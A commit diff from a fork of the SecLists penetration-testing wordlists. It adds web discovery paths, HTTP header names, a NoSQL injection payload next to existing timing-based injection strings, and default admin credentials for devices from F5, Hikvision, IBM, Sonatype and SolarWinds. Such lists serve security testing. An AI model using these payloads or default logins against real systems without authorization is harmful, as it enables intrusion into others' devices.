idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge branch 'danielmiessler:master' into master

Browse Source
This commit is contained in:
cbk914
2021-06-26 23:06:55 +02:00
committed by GitHub
parent cd20324f79 03b4d2c22c
commit 9a871facf1
5 changed files with 751 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

700
Discovery/Web-Content/CMS/wordpress.fuzz.txt
View File

File diff suppressed because it is too large Load Diff

11
Discovery/Web-Content/common.txt
View File

@@ -76,6 +76,7 @@
.well-known/nodeinfo .well-known/nodeinfo
.well-known/oauth-authorization-server .well-known/oauth-authorization-server
.well-known/openid-configuration .well-known/openid-configuration
.well-known/openid-federation
.well-known/openorg .well-known/openorg
.well-known/openpgpkey .well-known/openpgpkey
.well-known/pki-validation .well-known/pki-validation
@@ -319,6 +320,7 @@ ServerAdministrator
Services Services
Servlet Servlet
Servlets Servlets
Shibboleth.sso/Metadata
SiteMap SiteMap
SiteScope SiteScope
SiteServer SiteServer
@@ -1758,6 +1760,7 @@ fdcp
feature feature
featured featured
features features
federation/clients
fedora fedora
feed feed
feedback feedback
@@ -2351,6 +2354,7 @@ jump
juniper juniper
junk junk
jvm jvm
jwks.json
k k
katalog katalog
kb kb
@@ -2848,6 +2852,9 @@ nz
o o
oa_servlets oa_servlets
oauth oauth
oauth/authorize
oauth/token
oauth/token/info
obdc obdc
obj obj
object object
@@ -2979,6 +2986,7 @@ panelc
paper paper
papers papers
parse parse
par
part part
partenaires partenaires
partner partner
@@ -4151,6 +4159,9 @@ today
todel todel
todo todo
toggle toggle
token
token/introspect
token/revoke
tomcat tomcat
tomcat-docs tomcat-docs
tool tool

1
Fuzzing/Databases/NoSQL.txt
View File

@@ -15,6 +15,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
'%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''} {$gt: ''}
{"$gt": ""}
[$ne]=1 [$ne]=1
';sleep(5000); ';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);

31
Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt
View File

@@ -166,6 +166,9 @@ Core-Base
Correlates Correlates
Created Created
Credentials-Filepath Credentials-Filepath
Cross-Origin-Embedder-Policy
Cross-Origin-Opener-Policy
Cross-Origin-Resource-Policy
Curl Curl
Curl-Multithreaded Curl-Multithreaded
Custom-Header Custom-Header
@@ -261,6 +264,7 @@ Eve-Solarsystemname
Eve-Trusted Eve-Trusted
Ex-Copy-Movie Ex-Copy-Movie
Expect Expect
Expect-CT
Expectation-Failed Expectation-Failed
Expires Expires
Ext Ext
@@ -269,6 +273,7 @@ Fake-Header
Fastly-Client-Ip Fastly-Client-Ip
Fb-Appid Fb-Appid
Fb-Secret Fb-Secret
Feature-Policy
File-Not-Found File-Not-Found
Filename Filename
Files Files
@@ -462,6 +467,7 @@ Options
Organizer Organizer
Orig_path_info Orig_path_info
Origin Origin
Origin-Isolation
Originator Originator
Overwrite Overwrite
Params-Allow-Comma Params-Allow-Comma
@@ -874,6 +880,7 @@ X-Davical-Testcase
X-Dcmguid X-Dcmguid
X-Debug-Test X-Debug-Test
X-Device-User-Agent X-Device-User-Agent
X-Download-Options
X-Dialog X-Dialog
X-Dns-Prefetch-Control X-Dns-Prefetch-Control
X-Do-Not-Track X-Do-Not-Track
@@ -1008,10 +1015,12 @@ X-Os-Prefs
X-Overlay X-Overlay
X-Pagelet-Fragment X-Pagelet-Fragment
X-Password X-Password
X-Permitted-Cross-Domain-Policies
X-Phabricator-Csrf X-Phabricator-Csrf
X-Phpbb-Using-Plupload X-Phpbb-Using-Plupload
X-Pjax X-Pjax
X-Pjax-Container X-Pjax-Container
X-Powered-By
X-Prototype-Version X-Prototype-Version
X-Proxy-Url X-Proxy-Url
X-Pswd X-Pswd
@@ -1151,3 +1160,25 @@ Want-Digest
X-DNS-Prefetch-Control X-DNS-Prefetch-Control
X-ProxyUser-Ip X-ProxyUser-Ip
X-XSS-Protection X-XSS-Protection
Public-Key-Pins
Public-Key-Pins-Report-Only
Sec-Fetch-Site
Sec-Fetch-Mode
Sec-Fetch-User
Sec-Fetch-Dest
Last-Event-ID
Ping-From
NEL
Sec-WebSocket-Key
Sec-WebSocket-Extensions
Sec-WebSocket-Accept
Sec-WebSocket-Protocol
Sec-WebSocket-Version
Accept-Push-Policy
Accept-Signature
Alt-Svc
Date
Signed-Headers
Server-Timing
Service-Worker-Allowed
SourceMap

12
Passwords/Default-Credentials/default-passwords.csv
View File

@@ -686,6 +686,7 @@ Dell,admin,password,
Dell,rapport,r@p8p0r+,http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/ Dell,rapport,r@p8p0r+,http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/
Dell,root,calvin, Dell,root,calvin,
Dell,root,wyse,http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/ Dell,root,wyse,http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/
Dell Switch PowerConnect,admin,admin,https://www.192-168-0-1login.org/router/dell/switch-powerconnect/12568/
Demarc,admin,my_DEMARC, Demarc,admin,my_DEMARC,
Deutsche Telekom,<BLANK>,0, Deutsche Telekom,<BLANK>,0,
Deutsche Telekom,admin,<BLANK>, Deutsche Telekom,admin,<BLANK>,
@@ -889,6 +890,12 @@ F5,admin,admin,
F5,root,default, F5,root,default,
F5,support,<BLANK>, F5,support,<BLANK>,
F5-Networks,<N/A>,<BLANK>, F5-Networks,<N/A>,<BLANK>,
F5 BIG-IP Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148,
F5 BIG-IP command line,root,default,https://support.f5.com/csp/article/K13148,
F5 BIG-IQ Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148,
F5 BIG-IQ command line,root,default,,https://support.f5.com/csp/article/K13148,
F5 FirePass Administrative Console,admin,admin,https://support.f5.com/csp/article/K13148,
F5 FirePass Maintenance Console,maintenance,<N/A>,https://support.f5.com/csp/article/K13148,
Fastream Technologies,root,<BLANK>, Fastream Technologies,root,<BLANK>,
Fastwire,fastwire,fw, Fastwire,fastwire,fw,
FatWire,firstsite,firstsite,http://www.vvgr.demon.co.uk/FatWire_Analytics.pdf FatWire,firstsite,firstsite,http://www.vvgr.demon.co.uk/FatWire_Analytics.pdf
@@ -1031,6 +1038,7 @@ Hewlett-Packard,admin,admin,http://www.google.com/url?sa=t&source=web&cd=1&sqi=2
Hewlett-Packard,admin,hp.com, Hewlett-Packard,admin,hp.com,
Hewlett-Packard,admin,isee, Hewlett-Packard,admin,isee,
HighPOint,RAID,hpt,http://www.hptmac.com/image/PDF/RAID_Managment_Software_Download.pdf HighPOint,RAID,hpt,http://www.hptmac.com/image/PDF/RAID_Managment_Software_Download.pdf
Hikvision Network Camera,admin,12345,https://www.hikvision.com/UploadFile/image/EN-user%20manual%20of%20%20network%20camera%20v3.0.0.pdf
Honeynet Project,roo,honey, Honeynet Project,roo,honey,
Honeynet Project,root,honey, Honeynet Project,root,honey,
Honeywell,LocalComServer,LCS pwd 03, Honeywell,LocalComServer,LCS pwd 03,
@@ -1198,6 +1206,7 @@ IBM,user,USERP,
IBM,vt100,public,Swap MAC address chip from IBM,vt100,public,Swap MAC address chip from
IBM,webadmin,webibm, IBM,webadmin,webibm,
IBM,wpsadmin,wpsadmin, IBM,wpsadmin,wpsadmin,
IBM Storwize V7000,superuser,passw0rd,https://www.ibm.com/docs/en/flashsystem-7x00/7.8.1?topic=problem-procedure-resetting-superuser-password
INOVA,iclock,timely, INOVA,iclock,timely,
IQinVision,root,system,http://www.iqeye.com/iqeye/images/uploads/File/manuals/Quick-Install.pdf IQinVision,root,system,http://www.iqeye.com/iqeye/images/uploads/File/manuals/Quick-Install.pdf
IRC,<BLANK>,FOOBAR, IRC,<BLANK>,FOOBAR,
@@ -1565,6 +1574,8 @@ Network Everywhere,<BLANK>,admin,
NetworkICE,iceman,<BLANK>, NetworkICE,iceman,<BLANK>,
NewMedia-NET GmbH,root,admin,http://www.dd-wrt.com/wiki/index.php/Index:FAQ#What.27s_the_default_username_and_password.3F NewMedia-NET GmbH,root,admin,http://www.dd-wrt.com/wiki/index.php/Index:FAQ#What.27s_the_default_username_and_password.3F
Nexsan,ADMIN,PASSWORD, Nexsan,ADMIN,PASSWORD,
Sonatype Nexus Repository Manager,admin,admin123,https://help.sonatype.com/repomanager2/maven-and-other-build-tools/sbt
Sonatype Nexus Repository Manager,nexus,nexus,
Niksun,vcr,NetVCR,su after login with empty password Niksun,vcr,NetVCR,su after login with empty password
Nimble,<BLANK>,xdfk9874t3, Nimble,<BLANK>,xdfk9874t3,
Nimble,<N/A>,xdfk9874t3, Nimble,<N/A>,xdfk9874t3,
@@ -2342,6 +2353,7 @@ Software AG,Administrator,manage,
Softwarehouse,manager,manager, Softwarehouse,manager,manager,
SolarWinds,LocalAdministrator,#l@$ak#.lk;0@P,http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2532 SolarWinds,LocalAdministrator,#l@$ak#.lk;0@P,http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2532
SolarWinds,whd,whd,http://www.solarwinds.com/documentation/WebHelpDesk/docs/WHDAdminGuide.pdf SolarWinds,whd,whd,http://www.solarwinds.com/documentation/WebHelpDesk/docs/WHDAdminGuide.pdf
SolarWinds,admin,<BLANK>,
Solution 6,aaa,often blank, Solution 6,aaa,often blank,
Solwise,root,same as webui pwd, Solwise,root,same as webui pwd,
Sonic-X,root,admin, Sonic-X,root,admin,
1 Vendor Username Password Comments
686 Dell rapport r@p8p0r+ http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/
687 Dell root calvin
688 Dell root wyse http://www.vennercorp.com/blog/2014/09/08/what-are-the-default-wyse-admin-passwords/
689 Dell Switch PowerConnect admin admin https://www.192-168-0-1login.org/router/dell/switch-powerconnect/12568/
690 Demarc admin my_DEMARC
691 Deutsche Telekom <BLANK> 0
692 Deutsche Telekom admin <BLANK>
890 F5 root default
891 F5 support <BLANK>
892 F5-Networks <N/A> <BLANK>
893 F5 BIG-IP Configuration utility admin admin https://support.f5.com/csp/article/K13148
894 F5 BIG-IP command line root default https://support.f5.com/csp/article/K13148
895 F5 BIG-IQ Configuration utility admin admin https://support.f5.com/csp/article/K13148
896 F5 BIG-IQ command line root default
897 F5 FirePass Administrative Console admin admin https://support.f5.com/csp/article/K13148
898 F5 FirePass Maintenance Console maintenance <N/A> https://support.f5.com/csp/article/K13148
899 Fastream Technologies root <BLANK>
900 Fastwire fastwire fw
901 FatWire firstsite firstsite http://www.vvgr.demon.co.uk/FatWire_Analytics.pdf
1038 Hewlett-Packard admin hp.com
1039 Hewlett-Packard admin isee
1040 HighPOint RAID hpt http://www.hptmac.com/image/PDF/RAID_Managment_Software_Download.pdf
1041 Hikvision Network Camera admin 12345 https://www.hikvision.com/UploadFile/image/EN-user%20manual%20of%20%20network%20camera%20v3.0.0.pdf
1042 Honeynet Project roo honey
1043 Honeynet Project root honey
1044 Honeywell LocalComServer LCS pwd 03
1206 IBM vt100 public Swap MAC address chip from
1207 IBM webadmin webibm
1208 IBM wpsadmin wpsadmin
1209 IBM Storwize V7000 superuser passw0rd https://www.ibm.com/docs/en/flashsystem-7x00/7.8.1?topic=problem-procedure-resetting-superuser-password
1210 INOVA iclock timely
1211 IQinVision root system http://www.iqeye.com/iqeye/images/uploads/File/manuals/Quick-Install.pdf
1212 IRC <BLANK> FOOBAR
1574 NetworkICE iceman <BLANK>
1575 NewMedia-NET GmbH root admin http://www.dd-wrt.com/wiki/index.php/Index:FAQ#What.27s_the_default_username_and_password.3F
1576 Nexsan ADMIN PASSWORD
1577 Sonatype Nexus Repository Manager admin admin123 https://help.sonatype.com/repomanager2/maven-and-other-build-tools/sbt
1578 Sonatype Nexus Repository Manager nexus nexus
1579 Niksun vcr NetVCR su after login with empty password
1580 Nimble <BLANK> xdfk9874t3
1581 Nimble <N/A> xdfk9874t3
2353 Softwarehouse manager manager
2354 SolarWinds LocalAdministrator #l@$ak#.lk;0@P http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2532
2355 SolarWinds whd whd http://www.solarwinds.com/documentation/WebHelpDesk/docs/WHDAdminGuide.pdf
2356 SolarWinds admin <BLANK>
2357 Solution 6 aaa often blank
2358 Solwise root same as webui pwd
2359 Sonic-X root admin